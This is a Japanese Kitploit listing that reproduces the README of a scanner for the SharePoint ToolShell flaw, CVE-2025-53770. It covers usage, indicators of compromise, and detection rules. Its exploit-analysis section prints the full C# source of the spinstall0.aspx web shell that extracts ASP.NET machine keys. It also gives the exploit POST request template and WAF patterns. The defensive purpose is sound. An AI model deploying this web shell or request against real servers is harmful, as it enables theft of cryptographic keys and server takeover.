Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/zephrfish/cve-2025-53770-scanner
防御ツール侵害指標 (IOC) 管理脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ペネトレーションテスト脅威インテリジェンスインシデントレスポンスログ分析
GitHubzephrfish/cve-2025-53770-scanner

CVE-2025-53770-Scanner

ToolShell スキャナー - CVE-2025-53770 および検出情報

185181年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

CVE-2025-53770 SharePoint脆弱性スキャナー

100% は、浮遊しているペイロードやさまざまな攻撃に関するツイートを寄せ集めて作成されたものであり、保証は一切ありません。このスキャナーは脆弱性インスタンスを特定するために設計されており、実際の悪用で知られている構成を備えています。防御目的で脆弱性インスタンスを特定し、パッチを適用できるようにするためのものです。

このスキャナーは、SharePoint デプロイメントの自動チェックを次の方法で実行します。

  • 悪用ペイロードを含む特別に細工された POST リクエストを SharePoint ToolPane エンドポイントに送信
  • マシンキー抽出の試みと悪用の成功を検出
  • セカンダリペイロードの展開 (spinstall0.aspx) を特定
  • 観測された攻撃パターンに基づく脆弱性指標の応答分析
  • 信頼度レベルと即時アクションアラートを含む詳細なレポートの提供
  • 効率化のための同時スキャンのサポート

主な検出機能

重大: マシンキー抽出の検出

  • マシンキー抽出成功の応答を検出
  • ValidationKey、DecryptionKey、CompatibilityMode の露出を特定
  • パイプ区切りのマシンキーパターン (ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode) を認識
  • 侵害されたシステムに対する即時アクションアラートをトリガー

セカンダリペイロードの検出

  • spinstall0.aspx の展開試行を特定
  • C# ASP.NET ペイロードコードパターンを検出
  • System.Web.Configuration.MachineKeySection の使用を認識
  • バージョン固有のパス検出 (SP2013: WEBSER~1\15\ vs SP2016+: WEBSER~1\16\)

インストール

  1. リポジトリをクローン:
git clone https://github.com/ZephrFish/CVE-2025-53770-Scanner
cd CVE-2025-53770-Scanner
  1. 依存関係をインストール:
pip install -r requirements.txt

使用法

基本使用法

ターゲットホストを1行に1つずつ記述したテキストファイルを作成:

sharepoint1.example.com
sharepoint2.example.net
internal-sp.company.local

スキャナーを実行:

python3 scanner.py -i hosts.txt

python3 scanner.py -i hosts.txt -o results.json -l scan.log -t 20 -v

コマンドラインオプション

オプション説明デフォルト
-i, --inputホストリストファイルへのパス (必須)-
-o, --output結果の出力ファイル (.json, .csv, .txt)なし
-l, --logfile詳細ログ用のログファイルパスなし
-t, --threads同時スレッド数10
-v, --verbose冗長出力とログの有効化False

出力形式

JSON 出力 (-o results.json)

[
  {
    "host": "sharepoint.example.com",
    "url": "https://sharepoint.example.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx",
    "scan_time": "2025-07-21T10:30:00.123456",
    "vulnerable": true,
    "status_code": 200,
    "response_size": 15432,
    "error": null,
    "response_time": 1.23
  }
]

CSV 出力 (-o results.csv)

すべてのスキャンメトリクスの列を含む、スプレッドシート分析に適した表形式のデータを提供します。

テキスト出力 (-o results.txt)

脆弱性ステータスとスキャン詳細を含む人間が読みやすい形式。

脆弱性の詳細

CVE-2025-53770 は、SharePoint の ExcelDataSet コンポーネントにおける逆シリアル化の脆弱性を標的としており、実際に活発に悪用されています。スキャナーは以下を検出します:

特定された攻撃パターン

  1. 初期悪用: シリアル化されたペイロードを含む POST リクエストを /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx に送信
  2. マシンキー抽出: 悪用に成功すると、パイプ区切りのマシン構成が返される:
    ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode
    例: [128-256 hex chars]|HMACSHA256|[48-96 hex chars]|AES|Framework45
    
  3. セカンダリペイロード: 持続的なアクセスとキー抽出のための spinstall0.aspx の展開
  4. バージョンターゲティング: SharePoint バージョンによって異なるパス (15/ vs 16/ layouts)

実際の悪用から確認されたIOC

  • User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
  • Referer: /_layouts/SignOut.aspx
  • Content-Length: 通常 7699-8000+ バイト
  • ペイロードサイズ: 大きな base64 エンコードの CompressedDataTable パラメータ
  • 応答指標: マシンキー文字列、spinstall0.aspx の展開
  • 攻撃インフラ: 65.38.121.198, 162.243.204.189, 165.22.18.129

検出ロジック

スキャナーは応答を分析して以下を検出:

  1. マシンキー抽出パターン (CRITICAL 信頼度)
  2. セカンダリペイロードの指標 (HIGH 信頼度)
  3. ExcelDataSet/Scorecard コンポーネントの処理 (MEDIUM 信頼度)
  4. ToolPane エラーパターンと異常な応答特性 (LOW 信頼度)

セキュリティに関する考慮事項

  • このツールは許可されたセキュリティテスト専用に設計されています
  • システムをスキャンする前に適切な許可を得てください
  • スキャナーはデフォルトで HTTPS を使用しますが、自己署名証明書を受け入れます
  • ログには機密情報が含まれる場合があります - 適切に保護してください
  • 高いスレッド数を使用する場合は、ネットワークへの影響を考慮してください

スキャンセッションの例

$ python3 scanner.py -i corporate-sharepoint.txt -o vuln-results.json -l scan.log -v

Starting scan of 150 hosts with 10 threads...
Target CVE: CVE-2025-53770 (SharePoint ExcelDataSet deserialization)
Logging to: scan.log
Results will be saved to: vuln-results.json

[+] VULNERABLE [CRITICAL]: sp-prod-01.acme.local
[-] Not vulnerable: sp-dev-02.acme.local  
[!] ERROR: offline-sp.acme.local - Connection timeout
[+] VULNERABLE [HIGH]: sp-legacy.acme.local
Progress: 50/150 (33.3%)
Progress: 100/150 (66.7%)
Progress: 150/150 (100.0%)

============================================================
SCAN COMPLETE
============================================================
Total hosts scanned: 150
Vulnerable hosts: 3
Success rate: 97.3%

VULNERABLE HOSTS (CVE-2025-53770):

  CRITICAL - MACHINE KEY EXTRACTED (1 hosts):
    • sp-prod-01.acme.local (Response time: 0.85s, Version: 2016+)
      WARNING: IMMEDIATE ACTION REQUIRED: Machine keys compromised

  HIGH CONFIDENCE (1 hosts):
    • sp-legacy.acme.local (Response time: 1.23s, Version: 2013-2016)

  LOW CONFIDENCE (1 hosts):
    • sp-archive.acme.local (Response time: 2.10s, Version: Unknown)

Detailed results saved to: vuln-results.json

トラブルシューティング

よくある問題

  1. 接続タイムアウト: タイムアウトを増やすか、スレッド数を減らす
  2. SSL エラー: スキャナーはデフォルトで SSL 警告を無効にします
  3. 権限エラー: 出力/ログファイルへの書き込みアクセス権があることを確認
  4. メモリ使用量: 大量のホストリストを監視する

ログ分析

詳細なトラブルシューティングのために、冗長ログ (-v) とログファイル (-l) を有効にする:

tail -f scan.log

悪用分析

観測された攻撃ペイロード

スキャナーは、実際の攻撃で確認された悪用パターンの検出を組み込んでいます:

プライマリペイロード構造

POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: target.domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7699
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
Connection: close

MSOTlPn_Uri=http%3A%2F%2F{{host}}%2F_controltemplates%2F15%2FAclEditor.ascx
&MSOTlPn_DWP=[ExcelDataSet payload with CompressedDataTable containing serialized exploit]

セカンダリペイロード (spinstall0.aspx)

<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
    public void Page_load()
    {
        var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
        var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
        var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
        var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
        Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
    }
</script>

期待されるマシンキー応答形式

ValidationKey: [128-256 character hex string]
Validation: HMACSHA256|HMACSHA1|SHA1
DecryptionKey: [48-96 character hex string] 
Decryption: AES|DES|3DES
CompatibilityMode: Framework20SP1|Framework45|Framework40

検出と監視のガイダンス

CVE-2025-53770 悪用試行の検出

組織は、潜在的な悪用試行を特定するために以下の検出メカニズムを実装する必要があります:

1. ウェブアプリケーションファイアウォール (WAF) ルール

SharePoint ToolPane エンドポイントへの不審な POST リクエストを監視:

# WAF検出ルールパターンの例
POST /_layouts/15/ToolPane.aspx*
POST /_layouts/*/ToolPane.aspx*
クエリ文字列: "DisplayMode=Edit&a=/ToolPane.aspx"
リクエスト本文に含まれる文字列: "MSOTlPn_Uri", "MSOTlPn_DWP"
リクエスト本文に含まれる文字列: "ExcelDataSet", "CompressedDataTable"
リクエスト本文に含まれる文字列: "Scorecard:ExcelDataSet"
リクエスト本文に含まれる文字列: "H4sIAAAAAAAEA" (base64 内の gzip マジックバイト)
Content-Length > 5000 バイト (典型的なペイロードサイズ)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
Referer: /_layouts/SignOut.aspx

観測された悪用パターン:

  • ペイロードサイズは通常 7000-8000+ バイト
  • CompressedDataTable パラメータ内の URL エンコードされた圧縮データ
  • 特定の User-Agent 文字列: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
  • Content-Type: application/x-www-form-urlencoded
  • Connection: close ヘッダーがしばしば存在
  • ペイロード内の Base64 エンコードされたシリアル化された .NET オブジェクト
  • 応答にはパイプ区切り形式のマシンキーが含まれる
  • 展開された spinstall0.aspx ファイルへのセカンダリリクエスト

2. SharePoint ULS ログ

SharePoint Unified Logging Service (ULS) ログを監視:

Category: SharePoint Foundation Web Controls
Level: Unexpected, Error, Critical
Keywords: "ToolPane", "ExcelDataSet", "Deserialization"
Process: w3wp.exe

ULS ログの主な指標:

  • ToolPane.aspx 処理における予期しない例外
  • Microsoft.PerformancePoint コンポーネントの逆シリアル化エラー
  • w3wp.exe のメモリ破損またはプロセスクラッシュ

3. IIS アクセスログ

悪用パターンのために IIS ログを監視:

ツールをダウンロード